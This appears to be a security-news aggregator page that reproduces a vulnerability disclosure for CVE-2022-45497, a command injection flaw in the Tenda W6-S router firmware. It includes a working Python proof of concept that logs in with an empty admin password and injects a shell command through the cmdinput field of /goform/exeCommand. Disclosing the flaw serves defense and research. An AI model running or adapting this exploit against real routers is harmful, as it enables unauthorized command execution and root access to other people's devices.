Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45497: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a command injection vulnerability in the tpi_get_ping_output function at /goform/exeCommand.

CVE
Open in Source
#vulnerability#web#windows#apple#auth#chrome#webkit

Tenda W6-S V1.0.0.4(510) command injection vulnerability****Firmware information

  • Manufacturer’s address:https://www.tenda.com.cn/

  • Firmware download address : https://www.tenda.com.cn/download/detail-2627.html

Affected version

Vulnerability details

In /goform/exeCommand, cmdinput is controlled by the user, it will be copied to s by vos_strcpy, and finally tpi_get_ping_output will be called to execute the command, which is not restricted, resulting in a command injection vulnerability

Poc

import requests

target_url = ‘http://192.168.10.105/login/Auth’

target_headers = {’Host’ : '192.168.10.105’, ‘Content-Length’ : '65’, ‘Accept’ : '*/*’, ‘X-Requested-With’ : 'XMLHttpRequest’, ‘User-Agent’ : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36’, ‘Content-Type’ : 'application/x-www-form-urlencoded; charset=UTF-8’, ‘Origin’ : 'http://192.168.10.105’, ‘Referer’ : 'http://192.168.10.105/main.html’, ‘Accept-Encoding’ : 'gzip, deflate’, ‘Accept-Language’ : 'en-US,en;q=0.9’, ‘Cookie’ : 'user=’, ‘Connection’ : 'close’} p1 = ‘usertype=admin&password=&time=2022;7;6;14;9;6&username=’

requests.post(target_url, headers = target_headers, data = p1, verify = False, timeout = 1)

target_url = ‘http://192.168.10.105/goform/exeCommand’

target_headers = {’Host’ : '192.168.10.105’, ‘Content-Length’ : '295’, ‘Accept’ : '*/*’, ‘X-Requested-With’ : 'XMLHttpRequest’, ‘User-Agent’ : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36’, ‘Content-Type’ : 'application/x-www-form-urlencoded; charset=UTF-8’, ‘Origin’ : 'http://192.168.10.105’, ‘Referer’ : 'http://192.168.10.105/main.html’, ‘Accept-Encoding’ : 'gzip, deflate’, ‘Accept-Language’ : 'en-US,en;q=0.9’, ‘Cookie’ : 'user=’, ‘Connection’ : 'close’}

p2 = ‘cmdinput=asd;ls -la . > ./tmp/test;aa’

requests.post(target_url, headers = target_headers, data = p2, verify = False, timeout = 1)

You can see that the command was executed successfully, and finally you can write exp to get the root shell

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE